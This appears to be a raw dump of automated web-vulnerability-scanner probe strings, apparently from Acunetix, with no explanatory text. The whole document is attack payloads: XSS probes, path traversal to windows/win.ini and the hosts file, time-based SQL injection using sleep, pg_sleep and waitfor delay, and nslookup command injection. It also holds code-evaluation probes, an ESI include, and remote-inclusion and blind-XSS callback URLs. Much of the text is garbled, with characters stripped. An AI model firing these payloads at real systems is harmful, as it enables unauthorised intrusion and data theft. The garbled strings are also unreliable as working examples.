• 1()&acxScRiPt g7f6(9651)/ScRiPt
  • ??
  • ??
  • 19428775
  • JyI=
  • ()&acxScRiPt LTOz(9230)/ScRiPt
  • 7MpPX
  • !
  • 1()&acxScRiPt LTOz(9554)/ScRiPt
  • 1
  • /www.vulnweb.com
  • \
  • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • 1
  • WEBINF\web.xml
  • http://hitodBmr3dXDl.bxss.me/
  • print(md5(acunetix_wvs_security_test))\
  • action/.
  • WEBINF/web.xml
  • print(md5(acunetix_wvs_security_test))
  • action
  • print(md5(acunetix_wvs_security_test))a=
  • action
  • testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))a=
  • HttP://testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))
  • ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • testasp.vulnweb.com
  • ^(!)(()))
  • ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • http://testasp.vulnweb.com/t/fit.txt?.jpg
  • !(()&&!|||
  • /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  • Http://testasp.vulnweb.com/t/fit.txt
  • )
  • ..\..\..\..\..\..\..\..\windows\win.ini
  • 1some_inexistent_file_with_long_name
  • &n993923=v939315
  • ................windowswin.ini
  • http://someinexistentwebsite.acu/some_inexistent_file_with_long_name?.jpg
  • ????????????????????????????????????????????????windows??win.ini
  • 9999550+9999064
  • 12345\\)|]
  • ../../../../../../../../../../windows/win.ini
  • esi:include src=http://testasp.vulnweb.com/rpb.png/
  • C:\WINDOWS\system32\drivers\etc\hosts
  • &nslookup F4Jm163S&\`0&nslookup F4Jm163S&`
  • ../../../../../../../../../../windows/win.ini
  • (nslookup 7Exdn8ss)
  • 492LqZZj
  • set|set&set
  • (select(0)from(select(sleep(6)))v)/+(select(0)from(select(sleep(6)))v)++(select(0)from(select(sleep(6)))v)+/
  • 0XOR(if(now()=sysdate(),sleep(6),0))XORZ
  • 0XOR(if(now()=sysdate(),sleep(3),0))XORZ
  • if(now()=sysdate(),sleep(3),0)
  • 5GbWC1u1))select pg_sleep(3)
  • 4qDPNZAR)select pg_sleep(3)
  • pMAxsJC1select pg_sleep(9)
  • 1))select pg_sleep(9)
  • 1)select pg_sleep(9)
  • 1select pg_sleep(6)
  • AnTwWX2i)) waitfor delay 0:0:6
  • 62A2l46m) waitfor delay 0:0:6
  • 4VBoQeYi waitfor delay 0:0:3
  • 1 waitfor delay 0:0:3
  • 1)) waitfor delay 0:0:3
  • 1) waitfor delay 0:0:3
  • 1 waitfor delay 0:0:3
  • 1 OR 2+3533531=0+0+0+1
  • 1 OR 2+6246241=0+0+0+1 or r1RCgVif=
  • 1 OR 2+5425421=0+0+0+1
  • 1 OR 2+7097091=0+0+0+1
  • 1 OR 2+1081081=0+0+0+1
  • nnazaAO1
  • 1
  • 1
  • +response.write(99293359087244)+
  • +response.write(99293359087244)+
  • response.write(99293359087244)
  • 19871102
  • ()&acxScRiPt miS0(9297)/ScRiPt
  • 1()&acxScRiPt miS0(9322)/ScRiPt
  • &n991737=v986626
  • ??
  • ??
  • JyI=
  • 19035621
  • RafVs
  • ()&acxScRiPt YLqU(9519)/ScRiPt
  • 1
  • 1()&acxScRiPt YLqU(9689)/ScRiPt
  • \
  • action/.
  • 1
  • http://hitwhG0Fmpni2.bxss.me/
  • action
  • print(md5(acunetix_wvs_security_test))\
  • testasp.vulnweb.com/t/xss.html?00